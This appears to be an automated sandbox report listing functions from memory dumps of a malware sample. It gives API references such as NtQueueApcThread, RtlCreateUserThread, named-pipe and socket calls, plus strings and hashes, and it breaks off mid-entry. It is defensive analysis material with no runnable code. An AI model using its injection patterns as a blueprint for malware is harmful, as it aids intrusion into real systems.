Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlCreateUserThread$ntdll.dll
API String ID: 1646373207-2935400652
Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
Instruction ID: 412f3c1fad01ec40b37c44b9036fff2b84c8986c87c1a8c8b4a2999c95763c34
Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
Instruction Fuzzy Hash: BD016D32314B8192DB20CF11F894749B7A9FB88B80F998135EA9D43B14DF38C5A9C700

Function 00673C0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00673C30
GetProcAddress.KERNEL32 ref: 00673C40

Strings

NtQueueApcThread, xrefs: 00673C36
ntdll, xrefs: 00673C23

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: NtQueueApcThread$ntdll
API String ID: 1646373207-1374908105
Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
Instruction ID: f038d303a48577b73559bf0d1ae69cbde89ae8da4f8355f731266a35975aac91
Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
Instruction Fuzzy Hash: E601D125300B9292DB008F22F85435AB3A5FB89FD0F988625EF5C43B28DF38C5A68300

Function 00670C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00670C79
GetProcAddress.KERNEL32 ref: 00670C89

Strings

IsWow64Process, xrefs: 00670C7F
kernel32, xrefs: 00670C72

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
Instruction ID: e2daee7cb0072110a92526451e8d9e6f4daa953fa947003dfc671c17928fab38
Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
Instruction Fuzzy Hash: ACE04FA172270292FE05CB55E8A47656366EB88B91F481010D94B4AB65EF3DC5A9C710

Function 006720E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006720F4
GetProcAddress.KERNEL32 ref: 00672104

Strings

Wow64RevertWow64FsRedirection, xrefs: 006720FA
kernel32, xrefs: 006720ED

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 1646373207-3900151262
Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
Instruction ID: 3879d7efb5108f01c7375b1c336d0e57c507da3620a91ff4996a8e67f594b482
Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
Instruction Fuzzy Hash: 11D0A710752607A1FE089B91FC747A41356BB5AF40F4C1020891E0B720EE3DC1EDC350

Function 006720AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006720BC
GetProcAddress.KERNEL32 ref: 006720CC

Strings

Wow64DisableWow64FsRedirection, xrefs: 006720C2
kernel32, xrefs: 006720B5

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 1646373207-736604160
Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
Instruction ID: 4cd60276b6661a869d07d975088d21ef58a001d1a22f5fda6036dc8d0c00d3b0
Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
Instruction Fuzzy Hash: FBD0A710712607A1FE049BD1FC747A46356AB49F40F4C1021881E0A720EE3DC1EAC350

Function 001BB3C0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction ID: 9cd805be13f1b3885f796fd01702c1fa5e39bc59ddbb0bb5b327f8e09bdc8491
Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction Fuzzy Hash: D8519572605784CAE728CF19E9C57EC33A1F758B95F25412ADE1A4BBA1DB78C442CB80

Function 0067BFC0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction ID: 6eaaa9ab1a844fe88417ef1eff5ff3034109cd015612bf2cdfcfbf95f85d5a18
Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction Fuzzy Hash: 0051BF32741640CAD714EF29E8853A833E2F769B64F24823DDA1A5B761CB3EC452CF91

Function 001B2170 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B262E
Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B264C
Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2664
Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2671
Part of subcall function 001B25F4: rand.LIBCMT ref: 001B273D

strchr.LIBCMT ref: 001B21D6
_snprintf.LIBCMT ref: 001B220C

Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E

_snprintf.LIBCMT ref: 001B2223

Strings

not create token: %d, xrefs: 001B2205

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
String ID: not create token: %d
API String ID: 1095232423-2272930512
Opcode ID: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
Instruction ID: dd83be3cdc38468e2d72b40f691b647392f28cd9c647279351a05b32f2482063
Opcode Fuzzy Hash: 9f33a31cc3dbe4d390e57a8e0463a50ad11e38a52d1dbdd6b3122e58f7288ae2
Instruction Fuzzy Hash: 8441C066614EC091EA159F6ED1852E8B3B0FF98B95F085512DF8D67B20EF34D1B6C340

Function 00674A04 Relevance: 6.1, APIs: 4, Instructions: 80synchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00674A45

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

htonl.WS2_32 ref: 00674A5B

Part of subcall function 00674C44: PeekNamedPipe.KERNEL32 ref: 00674C7C

WaitForSingleObject.KERNEL32 ref: 00674AB6
free.LIBCMT ref: 00674AF2

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
String ID:
API String ID: 2495333179-0
Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
Instruction ID: 4648d0429a6de1d140e44e85e96c72b2234793a88890e8b2bc710f0046024de4
Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
Instruction Fuzzy Hash: 2321E13670064086DB64EF62E54876A73ABFB89B98F09C518DE5D0B71CEF38C891C748

Function 0067C230 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_time64.LIBCMT ref: 0067C254

Part of subcall function 0068145C: GetSystemTimeAsFileTime.KERNEL32 ref: 0068146A

Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454

malloc.LIBCMT ref: 0067C29C
strtok.LIBCMT ref: 0067C300
strtok.LIBCMT ref: 0067C311

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Timestrtok$FileSystem_getptd_time64malloc
String ID:
API String ID: 460628555-0
Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
Instruction ID: 8085eb6fc398f76177e30c2a2fe397d02a9ce9bf3850a8c026e00e981c306913
Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
Instruction Fuzzy Hash: 042124B6600B9481DB40DF91E08866D37AAF788FE4B06822AEF2E47742CF30C542C784

Function 001CE9D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CE9FC

Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72

_errno.LIBCMT ref: 001CEA08

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

_invalid_parameter_noinfo.LIBCMT ref: 001CEA13
strchr.LIBCMT ref: 001CEA29

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
Instruction ID: df1a2f1e0fb05b95aa4e2a41103ac0155ce180c4fd263ffc718e7481fa4e2d62
Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
Instruction Fuzzy Hash: 9C1122632083E489CB2596219050B3ABAD0F3B5FD5B1D812DEAD70BA45CB2CC541CB50

Function 001A04D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 001A0517
clock.LIBCMT ref: 001A0524
clock.LIBCMT ref: 001A052D
clock.LIBCMT ref: 001A053A

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction ID: dba1a0da941d908dcf79781d7b2a93baaae24648750842988d629b3281201762
Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction Fuzzy Hash: 19114826A04748895732EEA6748052BF690FB9D390F190035FE4403205EB74C881CF41

Function 006610D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 00661117
clock.LIBCMT ref: 00661124
clock.LIBCMT ref: 0066112D
clock.LIBCMT ref: 0066113A

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction ID: 24348d802dc2d1f08a0c155925a8388473e2b6d20b6d7e2de2e238697d943f74
Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction Fuzzy Hash: 04116632A04788599770EFA6A88156BF692FB8B3D0F1D0235EF944B705EA75CC82C740

Function 0068F5D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068F5FC

Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672

_errno.LIBCMT ref: 0068F608

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

_invalid_parameter_noinfo.LIBCMT ref: 0068F613
strchr.LIBCMT ref: 0068F629

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
Instruction ID: 57340b939f474d349f093d2e7be4e21bbf8914060297e7e2e26b8cd3160c6e13
Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
Instruction Fuzzy Hash: E21104626082E481CB207B25905027EB7A2E785FE4B1C8339FBD64BB65FA6CC4C3C710

Function 0067EF5C Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON

Download Yara Rule

APIs

accept.WS2_32 ref: 0067EF71
send.WS2_32 ref: 0067EFAF
send.WS2_32 ref: 0067EFC3
closesocket.WS2_32 ref: 0067EFD4

Part of subcall function 0067F098: closesocket.WS2_32 ref: 0067F0A4
Part of subcall function 0067F098: free.LIBCMT ref: 0067F0AE
Part of subcall function 0067F098: free.LIBCMT ref: 0067F0B7
Part of subcall function 0067F098: free.LIBCMT ref: 0067F0C0

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$closesocketsend$accept
String ID:
API String ID: 47150829-0
Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
Instruction ID: cf58eb68758bca1531fd76496b1870bd21c618929383d594a1707bb9788da1b2
Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
Instruction Fuzzy Hash: 7E012C7531494181DB549B36E965B292362E78DFF4F149211DE2A07F85CE3AC4958B40

Function 006753EC Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00675400
PeekNamedPipe.KERNEL32 ref: 00675425
Sleep.KERNEL32 ref: 0067543B
GetTickCount.KERNEL32 ref: 00675441

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
Instruction ID: 94c007245e2648addf3c19d2b24951ee6a5b039a2cf0f1d7f3946ca565b745a6
Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
Instruction Fuzzy Hash: 24F0A432614E5192E7108B25F84431AA3A6F784B81F648160DB8E42E78DE79C4D18705

Function 006748D8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006748F1
PeekNamedPipe.KERNEL32 ref: 00674916
Sleep.KERNEL32 ref: 0067492C
GetTickCount.KERNEL32 ref: 00674932

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
Instruction ID: 731b81161f5110ee6af5e0396237b43d73dcf653e201295d023d5e07bafe4612
Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
Instruction Fuzzy Hash: D7F0A432614A5192E7108B25F85431BB766F785B94F648120DB8D42F74DF3DC8918B04

Function 006776F0 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32 ref: 0067770E
GetProcessHeap.KERNEL32 ref: 00677714
HeapAlloc.KERNEL32 ref: 00677724
InitializeProcThreadAttributeList.KERNEL32 ref: 0067773F

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AttributeHeapInitializeListProcThread$AllocProcess
String ID:
API String ID: 1212816094-0
Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
Instruction ID: f678ab742e7207cbd561e49493ae46e7ce0d9f2ae07cae3b3ba7a2ec787c370f
Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
Instruction Fuzzy Hash: 65F0BB2672564192DB58CB75F45075A63A6EB8CB90F585436FB0F42B14DE3DC4958B00

Function 0067F098 Relevance: 6.0, APIs: 4, Instructions: 15COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 0067F0A4
free.LIBCMT ref: 0067F0AE

Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C

free.LIBCMT ref: 0067F0B7
free.LIBCMT ref: 0067F0C0

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errnoclosesocket
String ID:
API String ID: 1525665891-0
Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
Instruction ID: d39bbc40504ba38ceb802984a6386ecaa7359909dca3ee8dfc6d7303dc756805
Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
Instruction Fuzzy Hash: 9ED09E2671844481DF54EFF2D8A663C1322E7D8F94F1440359E2E4B366CD64CD95C348

Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 00402294
Unknown pseudo relocation protocol version %d., xrefs: 004022A8

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 0-395989641
Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608

Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

Address %p has no image-section, xrefs: 00401DC0, 00401FA5
VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788

Function 00401010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0040107F

Strings

06E, xrefs: 00401089
P0E, xrefs: 0040103D

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: __set_app_type
String ID: 06E$P0E
API String ID: 1108511539-3978550416
Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18

Function 001BEC60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001BECB1

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

_invalid_parameter_noinfo.LIBCMT ref: 001BECBC

Strings

B, xrefs: 001BECE8

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
Instruction ID: 4ab64148a078f30f592bfda4bf66d86ddaf9101564b499946e096a0180613029
Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
Instruction Fuzzy Hash: 31018472614B5486EB109F12D4447D9B6A1F7A9FE4F584325EF5817B95CF38C144CB00

Function 0067F860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0067F8B1

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

_invalid_parameter_noinfo.LIBCMT ref: 0067F8BC

Strings

B, xrefs: 0067F8E8

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID: B
API String ID: 1812809483-1255198513
Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction ID: 696ec82873bee636f2cfc17656ce8eca3729c8e3e8ee0a98847dae6747d9afc8
Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
Instruction Fuzzy Hash: 9001ADB2620B4086DB109F12E440799B662FB98FE4FA88325AF5C07BA5CF38C141CB04

Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Unknown error, xrefs: 00401D2C
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

